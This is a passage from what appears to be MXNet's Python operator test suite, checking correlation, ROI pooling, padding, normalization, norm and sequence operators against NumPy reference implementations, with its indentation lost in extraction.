a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, dtype=outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, dtype=exe_add.outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1._simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = True, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = True, dtype = dtype)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y._bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y._bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0] / s[1], axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out._simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype is 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s._simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
for enforce_safe_acc in ['1', '0']:
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order is 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order is 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@pytest.mark.skip(reason="Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
